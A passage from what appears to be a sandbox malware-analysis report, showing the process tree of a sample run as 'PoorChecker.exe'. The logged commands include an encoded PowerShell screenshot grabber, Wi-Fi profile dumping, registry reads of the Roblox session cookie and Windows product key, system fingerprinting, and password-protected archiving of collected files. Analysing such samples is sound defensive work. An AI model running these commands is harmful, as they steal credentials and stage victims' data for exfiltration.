      4⤵
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:408
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1568
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xbvq1ig3\xbvq1ig3.cmdline"
        5⤵
        
        PID:5508
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2640.tmp" "c:\Users\Admin\AppData\Local\Temp\xbvq1ig3\CSC1AEA108F94F944C6B7E8D3C897BC1A91.TMP"
        6⤵
        
        PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5416
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4528
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1056
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4444
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5348
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5308
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI17642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ZbHPI.zip" *"
    3⤵
    PID:5192
  - - C:\Users\Admin\AppData\Local\Temp\_MEI17642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI17642\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ZbHPI.zip" *
      4⤵
      Executes dropped EXE
      PID:5688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:5408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3892

C:\Users\Admin\Desktop\PoorChecker.exe
"C:\Users\Admin\Desktop\PoorChecker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1580
- C:\Users\Admin\Desktop\PoorChecker.exe
  "C:\Users\Admin\Desktop\PoorChecker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:3992

C:\Users\Admin\Desktop\PoorChecker.exe
"C:\Users\Admin\Desktop\PoorChecker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2960
- C:\Users\Admin\Desktop\PoorChecker.exe
  "C:\Users\Admin\Desktop\PoorChecker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:544

C:\Users\Admin\Desktop\PoorChecker.exe
"C:\Users\Admin\Desktop\PoorChecker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5180
- C:\Users\Admin\Desktop\PoorChecker.exe
  "C:\Users\Admin\Desktop\PoorChecker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5376

C:\Users\Admin\Desktop\PoorChecker.exe
"C:\Users\Admin\Desktop\PoorChecker.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5528
- C:\Users\Admin\Desktop\PoorChecker.exe
  "C:\Users\Admin\Desktop\PoorChecker.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:5708

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:5304

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4308

C:\Users\Admin\Desktop\resources\elevate.exe
"C:\Users\Admin\Desktop\resources\elevate.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffb2b85cc40,0x7ffb2b85cc4c,0x7ffb2b85cc58
  2⤵
  PID:6076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=1788 /prefetch:2
  2⤵
  PID:6004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1868,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2060 /prefetch:3
  2⤵
  PID:1236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=2472 /prefetch:8
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3152 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3696,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4056 /prefetch:1
  2⤵
  PID:5236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4868,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4912 /prefetch:8
  2⤵
  PID:5656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=5096 /prefetch:8
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Windows directory
  PID:5816
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff6b2bc4698,0x7ff6b2bc46a4,0x7ff6b2bc46b0
    3⤵
    - Drops file in Windows directory
    PID:4044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4760,i,14859107617281543939,8288163997503798478,262144 --variations-seed-version=20241022-180310.361000 --mojo-platform-channel-handle=4832 /prefetch:1
  2⤵
  PID:5912

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\RegisterHide.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffb2c9646f8,0x7ffb2c964708,0x7ffb2c964718
  2⤵
  PID:1312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
